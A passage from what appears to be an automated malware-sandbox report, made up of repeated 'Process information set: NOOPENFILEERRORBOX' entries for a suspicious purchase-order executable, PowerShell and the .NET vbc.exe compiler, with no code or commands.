                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\RFQ_PO N89397-GM7287-Order.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
